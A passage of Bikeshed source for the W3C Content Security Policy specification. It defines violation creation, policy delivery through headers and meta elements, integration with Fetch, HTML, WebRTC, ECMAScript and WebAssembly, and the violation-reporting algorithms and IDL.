  5.  Return |violation|.

  <h4 id="create-violation-for-request" algorithm>
    Create a violation object for |request|, and |policy|.
  </h4>

  Given a <a for="/">request</a> |request|, a <a for="/">policy</a> |policy|,
  the following algorithm creates a new <a>violation</a> object,
  and populates it with an initial set of data:

  1.  Let |directive| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  Let |violation| be the result of executing
      [[#create-violation-for-global]] on |request|'s
      <a for="request">client</a>'s <a for="environment settings object">global object</a>,
      |policy|, and |directive|.

  3.  Set |violation|'s <a for="violation">resource</a> to |request|'s
      <a for="request">url</a>.

      Note: We use |request|'s <a for="request">url</a>, and <em>not</em> its
      <a for="request">current url</a>, as the latter might contain information
      about redirect targets to which the page MUST NOT be given access.

  4.  Return |violation|.
</section>

<!-- Big Text: Delivery -->
<section>
  <h2 id="policy-delivery">
    Policy Delivery
  </h2>

  A server MAY declare a <a for="/">policy</a> for a particular <a>resource
  representation</a> via an HTTP response header field whose value is a
  <a>serialized CSP</a>. This mechanism is defined in detail in
  [[#csp-header]] and [[#cspro-header]], and the integration with Fetch
  and HTML is described in [[#fetch-integration]] and [[#html-integration]].

  A <a for="/">policy</a> may also be declared inline in an HTML document via a
  <{meta}> element's <{meta/http-equiv}> attribute, as described in
  [[#meta-element]].

  <h3 id="csp-header">
    The `Content-Security-Policy` HTTP Response Header Field
  </h3>

  The <dfn export id="header-content-security-policy" http-header>`Content-Security-Policy`</dfn>
  HTTP response header field is the preferred mechanism for delivering a policy from a server to a
  client. The header's value is represented by the following ABNF [[!RFC5234]]:

  <pre>
    Content-Security-Policy = 1#<a grammar>serialized-policy</a>
                        ; The '#' rule is the one defined in section 5.6.1 of RFC 9110
                        ; but it incorporates the modifications specified
                        ; in section 2.1 of this document.
  </pre>

  <div class="example">
    <pre>
      <a http-header>Content-Security-Policy</a>: script-src 'self';
                               report-to csp-reporting-endpoint
    </pre>
  </div>

  A server MAY send different `Content-Security-Policy` header field
  values with different <a>representations</a> of the same resource.

  When the user agent receives a `Content-Security-Policy` header field, it
  MUST <a abstract-op lt="parse a serialized CSP">parse</a> and <a>enforce</a> each
  <a>serialized CSP</a> it contains as described in [[#fetch-integration]],
  [[#html-integration]].

  <h3 id="cspro-header">
    The `Content-Security-Policy-Report-Only` HTTP Response Header Field
  </h3>

  The <dfn export id="header-content-security-policy-report-only" http-header>`Content-Security-Policy-Report-Only`</dfn>
  HTTP response header field allows web developers to experiment with policies by monitoring (but
  not enforcing) their effects. The header's value is represented by the following ABNF
  [[!RFC5234]]:

  <pre>
    Content-Security-Policy-Report-Only = 1#<a grammar>serialized-policy</a>
                        ; The '#' rule is the one defined in section 5.6.1 of RFC 9110
                        ; but it incorporates the modifications specified
                        ; in section 2.1 of this document.
  </pre>

  This header field allows developers to piece together their security policy in
  an iterative fashion, deploying a report-only policy based on their best
  estimate of how their site behaves, watching for violation reports, and then
  moving to an enforced policy once they've gained confidence in that behavior.

  <div class="example">
    <pre>
      <a http-header>Content-Security-Policy-Report-Only</a>: script-src 'self';
                                           report-to csp-reporting-endpoint
    </pre>
  </div>

  A server MAY send different `Content-Security-Policy-Report-Only`
  header field values with different <a>representations</a> of the same
  resource.

  When the user agent receives a `Content-Security-Policy-Report-Only` header
  field, it MUST <a abstract-op lt="parse a serialized CSP">parse</a> and <a>monitor</a>
  each <a>serialized CSP</a> it contains as described in
  [[#fetch-integration]] and [[#html-integration]].

  Note: The <a http-header>`Content-Security-Policy-Report-Only`</a> header is
  <strong>not</strong> supported inside a <{meta}> element.

  <h3 id="meta-element">
    The `<meta>` element
  </h3>

  A {{Document}} may deliver a policy via one or more HTML <{meta}> elements
  whose <{meta/http-equiv}> attributes are an <a>ASCII case-insensitive</a>
  match for the string "`Content-Security-Policy`". For example:

  <div class="example">
    <pre highlight="html">
      &lt;meta http-equiv="Content-Security-Policy" content="script-src 'self'"&gt;
    </pre>
  </div>

  Implementation details can be found in HTML's <a>Content Security Policy
  state</a> `http-equiv` processing instructions [[!HTML]].

  Note: The <a http-header>`Content-Security-Policy-Report-Only`</a> header is <em>not</em>
  supported inside a <{meta}> element. Neither are the `report-uri`,
  `frame-ancestors`, and `sandbox` directives.

  Authors are <em>strongly encouraged</em> to place <{meta}> elements as early
  in the document as possible, because policies in <{meta}> elements are not
  applied to content which precedes them. In particular, note that resources
  fetched or prefetched using the `Link` HTTP response header
  field, and resources fetched or prefetched using <{link}> and <{script}>
  elements which precede a <{meta}>-delivered policy will not be blocked.

  Note: A policy specified via a <{meta}> element will be enforced along with
  any other policies active for the protected resource, regardless
  of where they're specified. The general impact of enforcing multiple
  policies is described in [[#multiple-policies]].

  Note: Modifications to the <{meta/content}> attribute of a <{meta}> element
  after the element has been parsed will be ignored.
</section>

<!-- Big Text: Integration -->
<section>
  <h2 id="integrations">Integrations</h2>

  <em>This section is non-normative.</em>

  This document defines a set of algorithms which are used in other
  specifications in order to implement the functionality. These
  integrations are outlined here for clarity, but those external
  documents are the normative references which ought to be consulted for
  detailed information.

  <h3 id="fetch-integration">
    Integration with Fetch
  </h3>

  A number of <a>directives</a> control resource loading in one way or
  another. This specification provides algorithms which allow Fetch to make
  decisions about whether or not a particular <a for="/">request</a> should be blocked
  or allowed, and about whether a particular <a>response</a> should be replaced
  with a <a>network error</a>.

  1.  [[#should-block-request]] is called as part of step 2.4 of the <a>Main
      Fetch</a> algorithm. This allows directives' <a>pre-request checks</a>
      to be executed against each <a for="/">request</a> before it hits the network,
      and against each redirect that a <a for="/">request</a> might go through on its
      way to reaching a resource.

  2.  [[#should-block-response]] is called as part of step 11 of the <a>Main
      Fetch</a> algorithm. This allows directives' <a>post-request checks</a>
      to be executed on the <a>response</a> delivered from the network
      or from a Service Worker.

  <h4 id="report-for-request" algorithm dfn export>
    Report Content Security Policy violations for |request|
  </h4>

  Given a <a for="/">request</a> |request|, this algorithm reports violations based
  on [=request/policy container=]'s [=policy container/CSP list=] "report only" policies.

  1.  Let |CSP list| be |request|'s [=request/policy container=]'s [=policy container/CSP list=].

  2.  <a for=list>For each</a> |policy| of |CSP list|:

      1.  If |policy|'s <a for="policy">disposition</a> is "`enforce`",
          then skip to the next |policy|.

      2.  Let |violates| be the result of executing
          [[#does-request-violate-policy]] on |request| and |policy|.

      3.  If |violates| is not "`Does Not Violate`", then execute
          [[#report-violation]] on the result of executing
          [[#create-violation-for-request]] on |request|, and |policy|.

  <h4 id="should-block-request" algorithm dfn export>
    Should |request| be blocked by Content Security Policy?
  </h4>

  Given a <a for="/">request</a> |request|, this algorithm returns `Blocked` or `Allowed` and
  reports violations based on |request|'s [=request/policy container=]'s
  [=policy container/CSP list=].

  1.  Let |CSP list| be |request|'s [=request/policy container=]'s [=policy container/CSP list=].

  2.  Let |result| be "`Allowed`".

  3.  <a for=list>For each</a> |policy| of |CSP list|:

      1.  If |policy|'s <a for="policy">disposition</a> is "`report`",
          then skip to the next |policy|.

      2.  Let |violates| be the result of executing
          [[#does-request-violate-policy]] on |request| and |policy|.

      3.  If |violates| is not "`Does Not Violate`", then:

          1.  Execute [[#report-violation]] on the result of executing
              [[#create-violation-for-request]] on |request|, and |policy|.

          2.  Set |result| to "`Blocked`".

  4.  Return |result|.

  <h4 id="should-block-response" algorithm dfn export>
    Should |response| to |request| be blocked by Content Security Policy?
  </h4>

  Given a <a>response</a> |response| and a <a for="/">request</a> |request|, this algorithm
  returns `Blocked` or `Allowed`, and reports violations based on |request|'s
  [=request/policy container=]'s [=policy container/CSP list=].

  1.  Let |CSP list| be |request|'s [=request/policy container=]'s [=policy container/CSP list=].

  2.  Let |result| be "`Allowed`".

  3.  <a for=list>For each</a> |policy| of |CSP list|:

      1.  <a for=set>For each</a> |directive| of |policy|:

          1.  If the result of executing |directive|'s
              <a for="directive">post-request check</a> is "`Blocked`", then:

              1.  Execute [[#report-violation]] on the result of executing
                  [[#create-violation-for-request]] on |request|, and |policy|.

              2.  If |policy|'s <a for="policy">disposition</a> is "`enforce`",
                  then set |result| to "`Blocked`".

      Note: This portion of the check verifies that the page can load the
      response. That is, that a Service Worker hasn't substituted a file which
      would violate the page's CSP.

  4.  Return |result|.


  <h3 id="html-integration">
    Integration with HTML
  </h3>

  1.  The [=/policy container=] has a [=policy container/CSP list=], which holds
      all the <a for="/">policy</a> objects which are active for a given context. This
      list is empty unless otherwise specified, and is populated from the <a>response</a> by <a
      abstract-op lt="parse a response's Content Security Policies">parsing</a> <a>response</a>'s
      Content Security Policies or inherited following the rules of the [=/policy container=].

  2.  A <a for="/">global object</a>'s <dfn for="global object" id="global-object-csp-list">CSP list</dfn>
      is the result of executing [[#get-csp-of-object]] with the <a for="/">global object</a>
      as the `object`.

  3.  A <a for="/">policy</a> is <dfn export>enforced</dfn> or <dfn export>monitored</dfn> for a
      <a for="/">global object</a> by inserting it into the <a for="/">global object</a>'s
      <a for="global object">CSP list</a>.

  4.  [[#run-document-csp-initialization]] is called during the <a>create and initialize a
      new `Document` object</a> algorithm.

  5.  [[#should-block-inline]] is called during the <a>prepare the script element</a> and
      <a>update a `style` block</a> algorithms in order to determine whether or
      not an inline script or style block is allowed to execute/render.

  6.  [[#should-block-inline]] is called during handling of inline event
      handlers (like `onclick`) and inline `style` attributes in order to
      determine whether or not they ought to be allowed to execute/render.

  7.  <a for="/">policy</a> is <a>enforced</a> during processing of the <{meta}>
      element's <{meta/http-equiv}>.

  9.  HTML populates each <a for="/">request</a>'s <a for="request">cryptographic nonce
      metadata</a> and <a>parser metadata</a> with relevant data from the
      elements responsible for resource loading.

      ISSUE(whatwg/html#968): Stylesheet loading is not yet integrated with
      Fetch in WHATWG's HTML.

  9.  [[#allow-base-for-document]] is called during <{base}>'s <a>set the frozen
      base URL</a> algorithm to ensure that the <{base/href}> attribute's value
      is valid.

  10. [[#should-block-navigation-request]] is called during the <a spec=html>create
      navigation params by fetching</a> algorithm, and [[#should-block-navigation-response]]
      is called during the <a spec=html>attempt to populate the history entry's document</a>
      algorithm to apply directive's navigation checks, as well as inline checks for
      navigations to `javascript:` URLs.

  11. [[#run-global-object-csp-initialization]] is called during the <a>run a worker</a>
      algorithm.

  12. The <a>sandbox</a> directive is used to populate the <a spec=html>CSP-derived
      sandboxing flags</a>.

  <h4 id="run-document-csp-initialization" algorithm dfn export>
    Run `CSP` initialization for a `Document`
  </h4>

  Given a {{Document}} |document|, the user agent performs the following
  steps in order to initialize CSP for |document|:

  1. <a for=list>For each</a> |policy| of |document|'s [=Document/policy container=]'s
     [=policy container/CSP list=]:

      1.  <a for=set>For each</a> |directive| of |policy|:

          1.  Execute |directive|'s <a for="directive">initialization</a>
              algorithm on |document|, and assert: its returned value is
              "`Allowed`".

  <h4 id="get-csp-of-object" algorithm>
    Retrieve the <a for="global object">CSP list</a> of an |object|
  </h4>

  To obtain |object|'s <a for="global object">CSP list</a>:

  1.  If |object| is a {{Document}} return |object|'s [=Document/policy container=]'s
      [=policy container/CSP list=].

  2.  If |object| is a {{Window}} or a {{WorkerGlobalScope}} or a {{WorkletGlobalScope}},
      return <a>environment settings object</a>'s [=environment settings object/policy
      container=]'s [=policy container/CSP list=].

  3.  Return null.

  <h4 id="should-block-inline" algorithm dfn export>
    Should |element|'s inline |type| behavior be blocked by Content Security Policy?
  </h4>

  Given an {{Element}} |element|, a string |type|, and a string |source|
  this algorithm returns "`Allowed`" if the element is allowed to have inline
  definition of a particular type of behavior (script execution, style
  application, event handlers, etc.), and "`Blocked`" otherwise:

  Note: The valid values for |type| are "`script`", "`script attribute`",
  "`style`", and "`style attribute`".

  <ol class="algorithm">
    1.  Assert: |element| is not null.

    2.  Let |result| be "`Allowed`".

    3.  <a for=list>For each</a> |policy| of |element|'s {{Document}}'s <a for="/">global object</a>'s
        <a for="global object">CSP list</a>:

        1.  <a for=set>For each</a> |directive| of |policy|'s <a for="policy">directive set</a>:

            1.  If |directive|'s <a for="directive">inline check</a> returns
                "`Allowed`" when executed upon |element|, |type|, |policy| and |source|,
                skip to the next |directive|.

            2.  Let |directive-name| be the result of executing
                [[#effective-directive-for-inline-check]] on |type|.

            3.  Otherwise, let |violation| be the result of executing
                [[#create-violation-for-global]] on the <a>current settings
                object</a>'s <a for="environment settings object">global object</a>, |policy|,
                and |directive-name|.

            4.  Set |violation|'s <a for="violation">resource</a> to "`inline`".

            5.  Set |violation|'s <a for="violation">element</a> to |element|.

            6.  If |directive|'s <a for="directive">value</a> <a for="list">contains</a> the
                expression "<a grammar>`'report-sample'`</a>", then set |violation|'s
                <a for="violation">sample</a> to the substring of |source| containing its first 40
                characters.

            7.  Execute [[#report-violation]] on |violation|.

            8.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                set |result| to "`Blocked`".

    4.  Return |result|.
  </ol>

  <h4 id="should-block-navigation-request" algorithm dfn export>
    Should |navigation request| of |type| be blocked
    by Content Security Policy?
  </h4>

  Given a <a for="/">request</a> |navigation request| and a string |type| (either
  "`form-submission`" or "`other`"), this algorithm return "`Blocked`" if the active policy blocks
  the navigation, and "`Allowed`" otherwise:

  <ol class="algorithm">
    1.  Let |result| be "`Allowed`".

    2.  <a for=list>For each</a> |policy| of |navigation request|'s <a for="request">policy container</a>'s
        <a for="policy container">CSP list</a>:

        1.  <a for=set>For each</a> |directive| of |policy|:

            1.  If |directive|'s <a for="directive">pre-navigation check</a>
                returns "`Allowed`" when executed upon |navigation request|,
                |type|, and |policy| skip to the next |directive|.

            2.  Otherwise, let |violation| be the result of executing
                [[#create-violation-for-global]] on |navigation request|'s
                <a for="request">client</a>'s <a for="environment settings object">global object</a>,
                |policy|, and |directive|'s <a for="directive">name</a>.

            3.  Set |violation|'s <a for="violation">resource</a> to |navigation
                request|'s <a for="request">URL</a>.

            4.  Execute [[#report-violation]] on |violation|.

            5.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                set |result| to "`Blocked`".

    3.  If |result| is "`Allowed`", and if |navigation request|'s
        <a for="request">current URL</a>'s <a for="url">scheme</a> is `javascript`:

        1.  <a for=list>For each</a> |policy| of |navigation request|'s <a for="request">client</a>'s
            <a for="environment settings object">global object</a>'s
            <a for="global object">CSP list</a>:

            1.  <a for=set>For each</a> |directive| of |policy|:

                1.  Let |directive-name| be the result of executing
                    [[#effective-directive-for-inline-check]] on |type|.

                2.  If |directive|'s <a for="directive">inline check</a>
                    returns "`Allowed`" when executed upon null,
                    "`navigation`" and |navigation request|'s <a for="request">current URL</a>,
                    skip to the next |directive|.

                3.  Otherwise, let |violation| be the result of executing
                    [[#create-violation-for-global]] on |navigation request|'s
                    <a for="request">client</a>'s <a for="environment settings object">global object</a>,
                    |policy|, and |directive-name|.

                4.  Set |violation|'s <a for="violation">resource</a> to |navigation
                    request|'s <a for="request">URL</a>.

                5.  Execute [[#report-violation]] on |violation|.

                6.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                    set |result| to "`Blocked`".

    4.  Return |result|.
  </ol>

  <h4 id="should-block-navigation-response" algorithm dfn export>
    Should |navigation response| to |navigation request| of |type|
    in |target| be blocked by Content Security Policy?
  </h4>

  Given a <a for="/">request</a> |navigation request|, a <a>response</a> |navigation
  response|, a [=/CSP list=] |response CSP list|, a string |type| (either
  "`form-submission`" or "`other`"), and a <a>navigable</a> |target|, this algorithm
  returns "`Blocked`" if the active policy blocks the navigation, and "`Allowed`"
  otherwise:

  <ol class="algorithm">
    1.  Let |result| be "`Allowed`".

    2.  <a for=list>For each</a> |policy| of |response CSP list|:

        Note: Some directives (like <a>frame-ancestors</a>) allow a |response|'s
        <a>Content Security Policy</a> to act on the navigation.

        1.  <a for=set>For each</a> |directive| of |policy|:

            1.  If |directive|'s <a for="directive">navigation response check</a>
                returns "`Allowed`" when executed upon |navigation request|, |type|,
                |navigation response|, |target|, "`response`", and |policy|
                skip to the next |directive|.

            2.  Otherwise, let |violation| be the result of executing
                [[#create-violation-for-global]] on null, |policy|, and
                |directive|'s <a for="directive">name</a>.

                Note: We use null for the global object, as no global exists:
                we haven't processed the navigation to create a Document yet.

            3.  Set |violation|'s <a for="violation">resource</a> to |navigation
                response|'s <a for="response">URL</a>.

            4.  Execute [[#report-violation]] on |violation|.

            5.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                set |result| to "`Blocked`".

    3.  <a for=list>For each</a> |policy| of |navigation request|'s <a for="request">policy container</a>'s
        <a for="policy container">CSP list</a>:

        Note: Some directives in the |navigation request|'s context (like <a>frame-ancestors</a>)
        need the |response| before acting on the navigation.

        1.  <a for=set>For each</a> |directive| of |policy|:

            1.  If |directive|'s <a for="directive">navigation response check</a>
                returns "`Allowed`" when executed upon |navigation request|, |type|,
                |navigation response|, |target|, "`source`", and |policy|
                skip to the next |directive|.

            2.  Otherwise, let |violation| be the result of executing
                [[#create-violation-for-global]] on |navigation request|'s
                <a for="request">client</a>'s <a for="environment settings object">global object</a>,
                |policy|, and |directive|'s <a for="directive">name</a>.

            3.  Set |violation|'s <a for="violation">resource</a> to |navigation
                request|'s <a for="request">URL</a>.

            4.  Execute [[#report-violation]] on |violation|.

            5.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                set |result| to "`Blocked`".

    4.  Return |result|.
  </ol>

  <h4 id="run-global-object-csp-initialization" algorithm dfn export>
    Run `CSP` initialization for a global object
  </h4>

  Given a <a for="/">global object</a> |global|, the user agent performs the
  following steps in order to initialize CSP for |global|. This algorithm
  returns "`Allowed`" if |global| is allowed, and "`Blocked`" otherwise:

  <ol class="algorithm">
    1.  Let |result| be "`Allowed`".

    2.  <a for=list>For each</a> |policy| of |global|'s [=global object/CSP list=]:

        1.  <a for=set>For each</a> |directive| of |policy|:

            1. Execute |directive|'s <a for="directive">initialization</a> algorithm on
               |global|. If its returned value is "`Blocked`", then set |result| to
               "`Blocked`".

    3.  Return |result|.
  </ol>

  <h3 id="webrtc-integration">Integration with WebRTC</h3>

  <p>The [=administratively-prohibited=] algorithm calls [[#should-block-rtc-connection]]
  when invoked, and prohibits all candidates if it returns "`Blocked`".</p>

  <h4 id="should-block-rtc-connection">
    Should RTC connections be blocked for |global|?
  </h4>

  Given a [=/global object=] |global|, this algorithm returns "`Blocked`"
  if the active policy for |global| blocks RTC connections, and "`Allowed`" otherwise:

  <ol class="algorithm">
    1.  Let |result| be "`Allowed`".

    2.  <a for=list>For each</a> |policy| of |global|'s [=global object/CSP list=]:
          1.  <a for=set>For each</a> |directive| of |policy|:
              1.  If |directive|'s <a for="directive">webrtc pre-connect check</a>
                  returns "`Allowed`", [=iteration/continue=].

              2.  Otherwise, let |violation| be the result of executing
                  [[#create-violation-for-global]] on |global|, |policy|, and
                  |directive|'s <a for="directive">name</a>.

              3.  Set |violation|'s <a for="violation">resource</a> to null.

              4.  Execute [[#report-violation]] on |violation|.

              5.  If |policy|'s <a for="policy">disposition</a> is "`enforce`", then
                  set |result| to "`Blocked`".

    3.  Return |result|.
  </ol>

  <h3 id="ecma-integration">Integration with ECMAScript</h3>

  ECMAScript defines a {{HostEnsureCanCompileStrings()}} abstract operation
  which allows the host environment to block the compilation of strings into
  ECMAScript code. This document defines an implementation of that abstract
  operation which examines the relevant <a for="global object">CSP list</a>
  to determine whether such compilation ought to be blocked.

  <h4 id="can-compile-strings" algorithm dfn export>
    EnsureCSPDoesNotBlockStringCompilation(|realm|, |parameterStrings|, |bodyString|, |codeString|, |compilationType|, |parameterArgs|, |bodyArg|)
  </h4>

  Given a <a>realm</a> |realm|, a list of strings |parameterStrings|, a string |bodyString|, a string |codeString|, an enum (|compilationType|),
  a list of ECMAScript language values (|parameterArgs|), and an ECMAScript language value (|bodyArg|), this algorithm
  returns normally if string compilation is allowed, and throws an "`EvalError`"
  if not:

  1.  If |compilationType| is "`TIMER`", then:

      1.  Let |sourceString| be |codeString|.

  1.  Else:

      1.  Let |compilationSink| be "Function" if |compilationType| is "`FUNCTION`", and "Eval" otherwise.

      1.  Let |isTrusted| be `true` if |bodyArg| [=implements=] {{TrustedScript}}, and `false` otherwise.

      1.  If |isTrusted| is `true` then:

          1. If |bodyString| is not equal to |bodyArg|'s [=TrustedScript/data=], set |isTrusted| to `false`.

      1.  If |isTrusted| is `true`, then:

          1. Assert: |parameterArgs|' [list/size=] is equal to [parameterStrings]' [=list/size=].

          1. [=list/iterate|For each=] |index| of [=the range=] 0 to |parameterArgs]' [list/size=]:
              1. Let |arg| be |parameterArgs|[|index|].

              1. If |arg| [=implements=] {{TrustedScript}}, then:

                  1. if |parameterStrings|[|index|] is not equal to |arg|'s [=TrustedScript/data=], set |isTrusted| to `false`.

              1. Otherwise, set |isTrusted| to `false`.

      1.  Let |sourceToValidate| be a [=new=] {{TrustedScript}} object created in |realm|
          whose [=TrustedScript/data=] is set to |codeString| if |isTrusted| is `true`, and
          |codeString| otherwise.

      1. Let |sourceString| be the result of executing the [$Get Trusted Type compliant string$] algorithm, with
         {{TrustedScript}}, |realm|, |sourceToValidate|, |compilationSink|, and `'script'`.

      1.  If the algorithm throws an error, throw an {{EvalError}}.

      1.  If |sourceString| is not equal to |codeString|, throw an {{EvalError}}.

  1.  Let |result| be "`Allowed`".

  2.  Let |global| be |realm|'s [=realm/global object=].

  3.  <a for=list>For each</a> |policy| of |global|'s [=global object/CSP list=]:

      1.  Let |source-list| be null.

      2.  If |policy| contains a [=directive=] whose [=directive/name=] is "`script-src`", then
          set |source-list| to that [=directive=]'s [=directive/value=].

          Otherwise if |policy| contains a [=directive=] whose [=directive/name=] is
          "`default-src`", then set |source-list| to that directive's [=directive/value=].

      3.  If |source-list| is not null, and does not contain a [=source expression=] which is
          an [=ASCII case-insensitive=] match for the string "<a grammar>`'unsafe-eval'`</a>",
          then:

          1.  Let |violation| be the result of executing [[#create-violation-for-global]] on
              |global|, |policy|, and "`script-src`".

          2.  Set |violation|'s [=violation/resource=] to "`eval`".

          3.  If |source-list| [=list/contains=] the expression
              "<a grammar>`'report-sample'`</a>", then set |violation|'s [=violation/sample=] to
              the substring of |sourceString| containing its first 40 characters.

          4.  Execute [[#report-violation]] on |violation|.

          5.  If |policy|'s [=policy/disposition=] is "`enforce`", then set |result| to
              "`Blocked`".

  4.  If |result| is "`Blocked`", throw an `EvalError` exception.

<h3 id="wasm-integration">Integration with WebAssembly</h3>

WebAssembly defines the {{HostEnsureCanCompileWasmBytes()}} abstract operation
which allows the host environment to block the compilation of WebAssembly
sources into executable code. This document defines an implementation of this
abstract operation which examines the relevant <a for="global object">CSP
list</a> to determine whether such compilation ought to be blocked.

<h4 id="can-compile-wasm-bytes" algorithm dfn>
  EnsureCSPDoesNotBlockWasmByteCompilation|realm|
</h4>

Given a <a>realm</a> |realm|,
this algorithm returns normally if compilation is allowed, and throws a
{{WebAssembly.CompileError}} if not:

1.  Let |global| be |realm|'s [=realm/global object=].

2.  Let |result| be "`Allowed`".

3.  <a for=list>For each</a> |policy| of |global|'s [=global object/CSP list=]:

    1.  Let |source-list| be null.

    2.  If |policy| contains a [=directive=] whose [=directive/name=] is "`script-src`", then
        set |source-list| to that [=directive=]'s [=directive/value=].

        Otherwise if |policy| contains a [=directive=] whose [=directive/name=] is
        "`default-src`", then set |source-list| to that directive's [=directive/value=].

    3.  If |source-list| is non-null, and does not contain a [=source
        expression=] which is an [=ASCII case-insensitive=] match for the
        string "<a grammar>`'unsafe-eval'`</a>", and does not contain a
        [=source expression=] which is an [=ASCII case-insensitive=] match
        for the string "<a grammar>`'wasm-unsafe-eval'`</a>", then:

        1.  Let |violation| be the result of executing [[#create-violation-for-global]] on
            |global|, |policy|, and "`script-src`".

        2.  Set |violation|'s [=violation/resource=] to "`wasm-eval`".

        3.  Execute [[#report-violation]] on |violation|.

        4.  If |policy|'s [=policy/disposition=] is "`enforce`", then set |result| to
            "`Blocked`".

4.  If |result| is "`Blocked`", throw a {{WebAssembly.CompileError}} exception.

</section>

<!-- Big Text: Reporting -->
<section>
  <h2 id="reporting">
    Reporting
  </h2>

  When one or more of a <a for="/">policy</a>'s directives is violated,
  a <dfn export>csp violation report</dfn> may be generated and sent out to a
  reporting endpoint associated with the <a for="/">policy</a>.

  <p><a>csp violation reports</a> have the <a>report type</a>
  "csp-violation".</p>

  <p><a>csp violation reports</a> are <a>visible to
  <code>ReportingObserver</code>s</a>.

  <pre class="idl">
    [Exposed=Window]
    interface CSPViolationReportBody : ReportBody {
      [Default] object toJSON();
      readonly attribute USVString documentURL;
      readonly attribute USVString? referrer;
      readonly attribute USVString? blockedURL;
      readonly attribute DOMString effectiveDirective;
      readonly attribute DOMString originalPolicy;
      readonly attribute USVString? sourceFile;
      readonly attribute DOMString? sample;
      readonly attribute SecurityPolicyViolationEventDisposition disposition;
      readonly attribute unsigned short statusCode;
      readonly attribute unsigned long? lineNumber;
      readonly attribute unsigned long? columnNumber;
    };
  </pre>

  <h3 id="violation-events">
    Violation DOM Events
  </h3>

  <pre class="idl">
    enum SecurityPolicyViolationEventDisposition {
      "enforce", "report"
    };

    [Exposed=(Window,Worker)]
    interface SecurityPolicyViolationEvent : Event {
        constructor(DOMString type, optional SecurityPolicyViolationEventInit eventInitDict = {});
        readonly    attribute USVString      documentURI;
        readonly    attribute USVString      referrer;
        readonly    attribute USVString      blockedURI;
        readonly    attribute DOMString      effectiveDirective;
        readonly    attribute DOMString      violatedDirective; // historical alias of effectiveDirective
        readonly    attribute DOMString      originalPolicy;
        readonly    attribute USVString      sourceFile;
        readonly    attribute DOMString      sample;
        readonly    attribute SecurityPolicyViolationEventDisposition      disposition;
        readonly    attribute unsigned short statusCode;
        readonly    attribute unsigned long  lineNumber;
        readonly    attribute unsigned long  columnNumber;
    };

    dictionary SecurityPolicyViolationEventInit : EventInit {
        USVString      documentURI = "";
        USVString      referrer = "";
        USVString      blockedURI = "";
        DOMString      violatedDirective = "";
        DOMString      effectiveDirective = "";
        DOMString      originalPolicy = "";
        USVString      sourceFile = "";
        DOMString      sample = "";
        SecurityPolicyViolationEventDisposition disposition = "enforce";
        unsigned short statusCode = 0;
        unsigned long  lineNumber = 0;
        unsigned long  columnNumber = 0;
    };
  </pre>

  <h3 id="obtain-violation-blocked-uri" algorithm>
    Obtain the {{SecurityPolicyViolationEvent/blockedURI}} of a violation's |resource|
  </h3>

  Given a violation's <a for=violation>resource</a> |resource|, this algorithm returns a
  [=string=], to be used as the blocked URI field for violation reports.

  1. Assert: |resource| is a [=/URL=] or a [=string=].

  2. If |resource| is a [=/URL=], return the result of executing [[#strip-url-for-use-in-reports]] on
     |resource|.

  3. Return |resource|.

  <h3 id="deprecated-serialize-violation">
    Obtain the deprecated serialization of |violation|
  </h3>

  Given a <a>violation</a> |violation|, this algorithm returns a JSON text
  string representation of the violation, suitable for submission to a reporting
  endpoint associated with the deprecated <a>`report-uri`</a> directive.

  1.  Let |body| be a <a lt="ordered map">map</a> with its keys initialized as
      follows:

      :   "`document-uri`"
      ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
          <a for="violation">url</a>.
      :   "`referrer`"
      ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
          <a for="violation">referrer</a>.
      :   "`blocked-uri`"
      ::  The result of executing [[#obtain-violation-blocked-uri]] on |violation|'s
          <a for="violation">resource</a>.
      :   "`effective-directive`"
      ::  |violation|'s <a for="violation">effective directive</a>
      :   "`violated-directive`"
      ::  |violation|'s <a for="violation">effective directive</a>
      :   "`original-policy`"
      ::  The <a lt="serialized CSP">serialization</a> of |violation|'s
          <a for="violation">policy</a>
      :   "`disposition`"
      ::  The <a for="policy">disposition</a> of |violation|'s
          <a for="violation">policy</a>
      :   "`status-code`"
      ::  |violation|'s <a for="violation">status</a>
      :   "`script-sample`"
      ::  |violation|'s <a for="violation">sample</a>

          Note: The name `script-sample` was chosen for compatibility with an earlier iteration of
          this feature which has shipped in Firefox since its initial implementation of CSP. Despite
          the name, this field will contain samples for non-script violations, like stylesheets. The
          data contained in a {{SecurityPolicyViolationEvent}} object, and in reports generated via
          the new <a>`report-to`</a> directive, is named in a more encompassing fashion:
          {{SecurityPolicyViolationEvent/sample}}.

  2.  If |violation|'s <a for="violation">source file</a> is not null:

      1.  Set |body|["`source-file`'] to the result of executing [[#strip-url-for-use-in-reports]]
          on |violation|'s <a for="violation">source file</a>.

      2.  Set |body|["`line-number`"] to |violation|'s
          <a for="violation">line number</a>.

      3.  Set |body|["`column-number`"] to |violation|'s
          <a for="violation">column number</a>.

  3.  Assert: If |body|["`blocked-uri`"] is not "`inline`", then |body|["`sample`"]
      is the empty string.

  4.  Return the result of <a>serialize an infra value to JSON bytes</a> given
      «[ "csp-report" → body ]».

  <h3 id="strip-url-for-use-in-reports" algorithm>Strip URL for use in reports</h3>
  Given a [=/URL=] |url|, this algorithm returns a string representing the URL for use in violation
  reports:

  1. If |url|'s <a for="url">scheme</a> is not an <a>HTTP(S) scheme</a>,
     then return |url|'s <a for="url">scheme</a>.

  2. Set |url|’s <a for="url">fragment</a> to the empty string.

  3. Set |url|’s <a for="url">username</a> to the empty string.

  4. Set |url|’s <a for="url">password</a> to the empty string.

  5. Return the result of executing the <a>URL serializer</a> on |url|.

  <h3 id="report-violation" algorithm>
    Report a |violation|
  </h3>

  Given a <a>violation</a> |violation|, this algorithm reports it to the endpoint specified in
  |violation|'s <a for="violation">policy</a>, and fires a {{SecurityPolicyViolationEvent}} at
  |violation|'s [=violation/element=], or at |violation|'s <a for="violation">global object</a>
  as described below:

  1.  Let |global| be |violation|'s <a for="violation">global object</a>.

  2.  Let |target| be |violation|'s <a for="violation">element</a>.

  3.  <a>Queue a task</a> to run the following steps:

      Note: We "queue a task" here to ensure that the event targeting and dispatch
      happens after JavaScript completes execution of the task responsible for a
      given violation (which might manipulate the DOM).

      1.  If |target| is not null, and |global| is a {{Window}}, and |target|'s
          <a>shadow-including root</a> is not |global|'s <a>associated
